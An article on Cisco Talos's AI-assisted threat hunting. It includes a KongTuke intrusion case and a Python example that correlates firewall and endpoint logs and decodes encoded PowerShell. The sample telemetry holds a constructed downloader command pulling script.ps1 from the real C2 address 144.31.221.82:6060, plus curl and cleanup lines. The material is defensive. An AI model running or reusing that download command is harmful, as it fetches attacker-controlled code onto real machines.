How Cisco Talos hunts threats with AI and analysts
Cisco Talos runs continuous hypothesis-driven hunts that apply AI to telemetry and rely on human analysts to validate findings, identifying intrusions such as a KongTuke command-and-control connection by correlating firewall and endpoint logs.
Cisco Talos operates continuous, hypothesis-driven hunts that pair machine learning with human analysis. The team builds hunt hypotheses from active threat intelligence, incident response findings and patterns seen across nearly 50 million sensors, then searches telemetry for signals that a specific adversary technique would produce rather than waiting for signature alerts.
Hunts look for concrete indicators. Examples include Python HTTP user-agent strings connecting to low-reputation hosting, MSIEXEC user-agent activity consistent with living-off-the-land package fetching, machine-learning detection of algorithmically generated domains, outbound traffic to autonomous system ranges with a history of hosting command-and-control infrastructure, and application or user-agent behavior that deviates from an environment baseline. Endpoint discoveries generate network hunt targets: when an endpoint shows a new technique, the corresponding network indicators are searched for across firewall data for all enrolled customers.
An AI engine runs these hypotheses at scale and continuously across enrolled environments. The engine applies statistical and machine-learning models to reduce the volume of telemetry and surface high-probability candidates. Human analysts then investigate the candidates, apply operational context, and validate whether the activity represents malicious behavior in a particular customer environment.
A recent customer engagement demonstrates the cross-domain correlation Talos uses. Firewall logs recorded outbound connections to 144.31.221.82 on port 6060 with the URL path /capcha9856, a pattern consistent with traffic direction system redirects used in initial compromise chains. The firewall record showed which device connected and when, but not how the connection began or what ran on the host.
Pivoting to endpoint telemetry for the same device IP produced a process history that completed the picture. The endpoint showed cmd.exe spawning powershell.exe with an -EncodedCommand parameter carrying a Base64 payload. The decoded commands used Invoke-WebRequest to download a file named script.ps1 into the user's ApplicationData folder. A curl.exe process made requests to the same command-and-control infrastructure flagged by the firewall, and a Remove-Item call attempted to delete the downloaded script. Analysts used process hashes and file paths from the endpoint to search the wider environment and determine the scope of compromise.
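The firewall-to-endpoint pivot described above, as an added Python example that is not Talos's tooling: it decodes the -EncodedCommand argument (Base64 of UTF-16LE script text) and correlates firewall and endpoint records by host and time window to flag the behaviours the engagement showed. The sample records, hashes, hostnames and stager text are constructed; only the C2 address and URL path come from the engagement described in the text.

```python
import base64
import re
from datetime import datetime, timedelta

C2_IP = "144.31.221.82"  # indicator from the engagement described in the text
def encode_ps(cmd: str) -> str:
    """Build a -EncodedCommand value: Base64 of the UTF-16LE script text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()
# Constructed sample telemetry (not from the Talos report); hashes are placeholders.
FIREWALL = [
    {"ts": "2024-05-01T10:02:11", "src": "10.0.0.25", "dst": C2_IP, "dport": 6060, "path": "/capcha9856"},
    {"ts": "2024-05-01T10:05:40", "src": "10.0.0.31", "dst": "203.0.113.9", "dport": 443, "path": "/"},
]
STAGER = f"Invoke-WebRequest -Uri http://{C2_IP}:6060/capcha9856 -OutFile $env:APPDATA\\script.ps1"
ENDPOINT = [
    {"ts": "2024-05-01T10:02:05", "host": "10.0.0.25", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + encode_ps(STAGER), "sha256": "PLACEHOLDER_HASH_1"},
    {"ts": "2024-05-01T10:02:13", "host": "10.0.0.25", "parent": "powershell.exe", "image": "curl.exe",
     "cmdline": f"curl.exe http://{C2_IP}:6060/capcha9856", "sha256": "PLACEHOLDER_HASH_2"},
    {"ts": "2024-05-01T10:02:30", "host": "10.0.0.25", "parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Remove-Item $env:APPDATA\\script.ps1", "sha256": "PLACEHOLDER_HASH_1"},
    {"ts": "2024-05-01T10:05:38", "host": "10.0.0.31", "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe https://203.0.113.9/", "sha256": "PLACEHOLDER_HASH_3"},
]
# Common spellings of the parameter; PowerShell accepts any unambiguous prefix.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if the line carries none."""
    m = ENC_RE.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None
def correlate(firewall, endpoint, c2_ip=C2_IP, window=timedelta(minutes=10)):
    """Pivot from firewall hits on the C2 indicator to endpoint events on the same
    host within the window, then check for the behaviours the text describes."""
    findings = []
    for fw in (f for f in firewall if f["dst"] == c2_ip):
        t0 = datetime.fromisoformat(fw["ts"])
        related = [e for e in endpoint if e["host"] == fw["src"]
                   and abs(datetime.fromisoformat(e["ts"]) - t0) <= window]
        decoded = [d for d in (decode_encoded_command(e["cmdline"]) for e in related) if d]
        findings.append({
            "host": fw["src"], "c2": f"{fw['dst']}:{fw['dport']}{fw['path']}",
            "encoded_launch": any(e["parent"] == "cmd.exe" and ENC_RE.search(e["cmdline"]) for e in related),
            "downloader_to_c2": any("Invoke-WebRequest" in d and c2_ip in d for d in decoded),
            "curl_to_c2": any(e["image"] == "curl.exe" and c2_ip in e["cmdline"] for e in related),
            "cleanup_attempted": any("Remove-Item" in e["cmdline"] for e in related),
            "pivot_hashes": sorted({e["sha256"] for e in related}),  # seeds the wider-environment search
        })
    return findings
```

The returned hashes are the pivot values an analyst would search across other hosts to scope the compromise.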
Talos describes the model as a hybrid: AI handles scale, persistence and statistical scoring while analysts provide context, cross-source correlation and judgment. Confirmed findings are documented for customers with mapped techniques, technical details and recommended remediation steps.
Each confirmed intrusion is evaluated for detection gaps. When automated detection could have captured the activity, Talos recommends rule tuning, sensor configuration changes or policy adjustments. Those changes inform product updates and customer configuration guidance.
Cisco notes some features are in various stages of development and availability varies; customers should consult their account teams for implementation details.